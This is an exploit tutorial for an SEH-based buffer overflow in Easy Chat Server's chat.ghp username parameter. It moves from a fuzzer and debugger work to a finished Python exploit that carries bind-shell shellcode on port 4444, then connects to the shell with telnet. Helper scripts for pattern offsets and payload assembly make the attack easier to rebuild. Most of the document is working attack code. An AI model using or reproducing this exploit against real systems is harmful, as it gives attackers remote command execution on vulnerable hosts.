EXPLOIT EASY CHAT SERVER WITH AN SEH-BASED OVERFLOW

OK, now we will discuss how to exploit Easy Chat Server using an SEH (Structured Exception Handler) overwrite.
First make sure Easy Chat Server is installed on Windows XP SP3, then start the Easy Chat Server application.

Next we use Wireshark to capture a normal request to the server and find the parameter to attack: the capture shows the GET request to chat.ghp with the username, password, room and sex parameters, and username is the field we will overflow.

After we have found the vulnerable parameter, we create the fuzzer shown below (10000 "A" bytes in the username field).

#!/usr/bin/env python3
# First fuzzer: send an oversized username (10000 x "A") in the chat.ghp GET request.
import socket

buf = b"\x41" * 10000
buffer = b"GET /chat.ghp?username=" + buf + b"&password=ywd&room=1&sex=0 HTTP/1.1\r\n"
buffer += b"Host: 192.168.43.2\r\n\r\n"      # the blank line ends the request headers
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.43.2', 80))
s.send(buffer)
s.close()


Next start Easy Chat Server, start its service, and open the running process in OllyDbg.

Open the SEH chain window: click the View menu and select SEH chain.

Run the fuzzer against the server. When OllyDbg stops on the access violation, press Shift+F9 to pass the exception to the program, so that the overwritten SEH handler is used.

Select the third row in the stack window, right-click and choose Follow in Dump.

Next step: in an SEH exploit the overwritten handler must point to a POP POP RET sequence, so select a module to take that address from. Here I am using the module WININET.dll.

Double-click the module to open it and press Ctrl+F to search for the instruction sequence.

Click Find.

Then test the address from the module in the way shown below.

Next we replace the A's with a unique, non-repeating pattern string (for example one generated with Metasploit's pattern_create), and run Easy Chat Server under OllyDbg again.

The EIP value changes: it now holds four bytes of the pattern instead of 0x41414141.

Now we work out how many bytes it takes to reach EIP (the overwritten SEH handler) and the stack value (the next-SEH pointer just before it) by looking those bytes up in the pattern.

As shown above, the offset to EIP is 220 and the offset to the stack value is 216.
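The offset calculation above can be reproduced without the OllyDbg screenshots. The following Python is an added example, not code from the original write-up: it builds the Metasploit-style cyclic pattern, looks a DWORD up in it, and derives the nSEH and handler offsets from the EIP value seen after Shift+F9. The EIP value 0x68413368 used in the `__main__` block is constructed (it is simply the DWORD that sits at offset 220 of this pattern), not a value taken from the page.

```python
# Added example: cyclic pattern and offset lookup for the SEH overwrite.
import itertools
import string
import struct


def pattern_create(length):
    """Return `length` bytes of the Aa0Aa1...Zz9 cyclic pattern (period 20280)."""
    triplets = (u + l + d
                for u in string.ascii_uppercase
                for l in string.ascii_lowercase
                for d in string.digits)
    out = bytearray()
    for triplet in itertools.cycle(triplets):
        out += triplet.encode()
        if len(out) >= length:
            return bytes(out[:length])


def pattern_offset(pattern, value):
    """Offset of `value` in the pattern, or -1 if it is not part of it.

    `value` is either the raw 4 bytes found in a stack slot, or the DWORD as
    OllyDbg prints it (e.g. EIP = 68413368); the DWORD is little-endian in memory.
    """
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return pattern.find(value)


def seh_offsets(pattern, eip_dword):
    """Given EIP after Shift+F9 (the overwritten handler), return
    (nSEH offset, handler offset): nSEH is the DWORD right before the handler."""
    handler_off = pattern_offset(pattern, eip_dword)
    if handler_off < 0:
        raise ValueError("EIP value is not part of the pattern")
    return handler_off - 4, handler_off


if __name__ == "__main__":
    pattern = pattern_create(10000)          # same length as the 10000 A's
    eip_seen = 0x68413368                    # constructed: the DWORD at offset 220
    nseh, handler = seh_offsets(pattern, eip_seen)
    print("nSEH offset =", nseh, " SEH handler offset =", handler)
```

Feed `pattern_create(10000)` into the username field instead of the A's, read EIP from OllyDbg after Shift+F9, and pass it to `seh_offsets`; the two numbers are what the 216 and 220 in the fuzzer below stand for.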
Next step: edit the fuzzer so that the bytes landing on nSEH and on the SEH handler are recognisable.
#!/usr/bin/env python3
# Second fuzzer: 216 bytes of filler, 4 bytes that land on nSEH (INT3 = \xCC),
# 4 bytes that land on the SEH handler (\x41), then padding to the original size.
import socket

buffer = b"GET /chat.ghp?username="
buffer += b"\x90" * 216                     # filler up to the nSEH pointer
buffer += b"\xCC\xCC\xCC\xCC"               # nSEH (offset 216)
buffer += b"\x41\x41\x41\x41"               # SEH handler (offset 220) -> EIP after Shift+F9
buffer += b"\x90" * (10008 - len(buffer))   # pad the request to the original size
buffer += b"&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 80))
s.send(buffer)
s.close()
RESULT
As shown above, EIP is now 0x41414141: the four \x41 bytes at offset 220 have become the SEH handler address.
Next step: edit the fuzzer again, replacing the \x41 bytes with the address found in the module.

#!/usr/bin/env python3
# Third fuzzer: the SEH handler now points at the address found in the module
# (0x63004734, written little-endian). nSEH stays INT3 so that OllyDbg breaks
# there when the POP POP RET returns into it, proving the address works.
import socket

buffer = b"GET /chat.ghp?username="
buffer += b"\x90" * 216                     # filler up to nSEH
buffer += b"\xCC\xCC\xCC\xCC"               # nSEH: INT3 breakpoints
buffer += b"\x34\x47\x00\x63"               # SEH handler: 0x63004734 (little-endian)
buffer += b"\x90" * (10008 - len(buffer))   # pad the request to the original size
buffer += b"&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 80))
s.send(buffer)
s.close()

Next open a new console.

Then open the payload generator's address in a web browser and select the payload (here a bind shell listening on TCP port 4444, which is what we connect to with telnet at the end).

Copy the generated shellcode into the fuzzer.

#!/usr/bin/env python3
# Final exploit: nSEH = short jump over the handler address, SEH handler = the
# POP POP RET address, then a NOP sled into the bind-shell payload.
import socket

buffer = b"GET /chat.ghp?username="
buffer += b"\x90" * 216                     # filler up to the nSEH pointer
buffer += b"\xeb\x06\x90\x90"               # nSEH: jmp short +6 (skips the 4-byte handler address)
buffer += b"\x34\x47\x00\x63"               # SEH handler: 0x63004734 (little-endian)
buffer += b"\x90" * (10008 - len(buffer))   # NOP sled the short jump lands in
buffer += b"\x90" * 16
# shellcode copied from the payload generator in the previous step (bind shell on TCP 4444)
buffer += (b"\x33\xc9\xd9\xcd\xb1\x51\xd9\x74\x24\xf4\xb8\xc5\xf9\x47\x64\x5e"
b"\x83\xc6\x04\x31\x46\x11\x03\x83\xe8\xa5\x91\xf7\x61\xc1\x17\xef"
b"\x8f\xea\x57\x10\x0f\x9e\xc4\xca\xf4\x2b\x51\x2e\x7e\x57\x5f\x36"
b"\x81\x47\xd4\x89\x99\x1c\xb4\x35\x9b\xc9\x02\xbe\xaf\x86\x94\x2e"
b"\xfe\x58\x0f\x02\x85\x99\x44\x5d\x47\xd3\xa8\x60\x85\x0f\x46\x59"
b"\x5d\xf4\x8f\xe8\xb8\x7f\x90\x36\x42\x6b\x49\xbd\x48\x20\x1d\x9e"
b"\x4c\xb7\xca\x23\x41\x3c\x85\x4f\xbd\x5e\xf7\x4c\x8c\x85\x93\xd9"
b"\xac\x09\xd7\x9d\x3e\xe1\x97\x01\x92\x7e\x17\x31\xb2\xe8\x16\x0f"
b"\x44\x05\x76\x70\x8e\xb3\x24\xe8\x47\x0f\xf9\x9c\xe0\x1c\xcf\x03"
b"\x5b\x1c\xff\xd3\xa8\x0f\xfc\x18\x7f\x2f\x2b\x01\xf6\x2a\xb2\x3c"
b"\xe5\xbd\x39\x6b\x9c\xbf\xc2\x43\x08\x19\x35\x96\x64\xce\xb9\x8e"
b"\x24\xa2\x16\x7d\x98\x07\xca\xc2\x4d\x77\x3c\xa2\x19\x96\xe1\x4c"
b"\x89\x11\xf8\x05\x45\x86\xe1\x55\x51\x91\xea\x43\x37\x0e\x44\x3e"
b"\x37\xfe\x0e\x64\x6a\xd1\x27\x33\x8a\xf8\xeb\xee\x8b\xd5\x64\xf5"
b"\x3d\x50\x3d\xa2\x42\x8a\xee\x18\xe9\x66\xf0\x70\x82\xe1\xe9\x09"
b"\x63\x88\xa2\x16\xbd\x3e\xb2\x38\x24\xab\x28\xde\xc1\x48\xdc\x97"
b"\xf7\xe5\x4e\xfe\xde\x35\xe7\xe7\x4b\x82\x71\x05\xba\xca\x71\x63"
b"\x43\x88\x58\x8d\xfe\x21\x30\xfc\x85\x01\x9d\x55\xd2\x1a\x93\x57"
b"\x96\xcd\xac\xd2\x9d\x0e\x84\x47\x49\xa3\x78\x26\x24\x29\x7a\x99"
b"\x97\xf8\x2d\xe6\xc8\x6b\x63\xc1\xec\xa5\x28\x0e\x38\x53\x30\x0f"
b"\xf2\x5b\x1e\x64\xaa\x5f\x1c\xbe\x31\x5f\xf5\x6c\x45\x4f\x92\xee"
b"\x61\x92\x10\x5d\x6d\x85\x28\xb1")
buffer += b"&password=admin&room=1&sex=0 HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.56.101', 80))
s.send(buffer)
s.close()
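To make the layout of the final request checkable rather than counted by hand, here is an added example (not the write-up's own code) that builds the same payload from its parts: the offsets 216/220 and the handler address 0x63004734 are taken from the text above, the `jmp short` distance is derived instead of hard-coded, and the 4-byte INT3 shellcode stand-in in `__main__` is constructed so that the script runs offline. Unlike the fuzzer above, it pads the username value itself to 10008 bytes (the fuzzer counts the GET prefix in that length as well).

```python
# Added example: assemble and verify the SEH payload layout used in this write-up.
import struct

NSEH_OFFSET = 216           # offset of the next-SEH pointer (from the pattern step)
HANDLER_ADDR = 0x63004734   # POP POP RET address used above, i.e. b"\x34\x47\x00\x63"
TOTAL_LEN = 10008           # length of the username value before the NOP sled/shellcode


def short_jmp(skip):
    """x86 'jmp short' that lands `skip` bytes after the start of the jmp itself.
    rel8 is counted from the end of the 2-byte instruction, so rel8 = skip - 2."""
    rel = skip - 2
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", rel)


def seh_payload(shellcode, nseh_offset=NSEH_OFFSET, handler=HANDLER_ADDR,
                total_len=TOTAL_LEN, sled=16):
    """filler | nSEH (jmp over the next 8 bytes) | handler | NOP pad | NOP sled | shellcode"""
    nseh = short_jmp(8) + b"\x90\x90"          # skip nSEH (4) + handler (4) = 8 bytes
    seh = struct.pack("<I", handler)           # little-endian handler address
    head = b"\x90" * nseh_offset + nseh + seh
    pad = b"\x90" * (total_len - len(head))    # NOP sled the short jump lands in
    return head + pad + b"\x90" * sled + shellcode


def check_layout(payload, nseh_offset=NSEH_OFFSET, handler=HANDLER_ADDR):
    """True if nSEH and the handler sit exactly where the crash analysis says."""
    nseh = payload[nseh_offset:nseh_offset + 4]
    seh = struct.unpack("<I", payload[nseh_offset + 4:nseh_offset + 8])[0]
    return nseh == short_jmp(8) + b"\x90\x90" and seh == handler


def build_request(payload, host):
    """Wrap the payload in the same chat.ghp GET request the fuzzers use."""
    return (b"GET /chat.ghp?username=" + payload
            + b"&password=admin&room=1&sex=0 HTTP/1.1\r\n"
            + b"Host: " + host.encode() + b"\r\n\r\n")


if __name__ == "__main__":
    shellcode = b"\xcc" * 4                  # constructed stand-in for the real payload
    payload = seh_payload(shellcode)
    print("layout ok:", check_layout(payload), " total bytes:", len(payload))
    print(build_request(payload, "192.168.56.101")[:60])
```

Swap the stand-in for the generated shellcode and send `build_request(...)` over a socket exactly as the exploit above does; `check_layout` fails loudly if an offset or the byte order of the handler address is wrong, which is the usual reason an SEH exploit lands in a NOP sled but never reaches the shellcode.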

Now connect to the bind shell: type the command telnet 192.168.56.101 4444 and press Enter.

And see what happened to Easy Chat Server.



 "GOOD LUCK"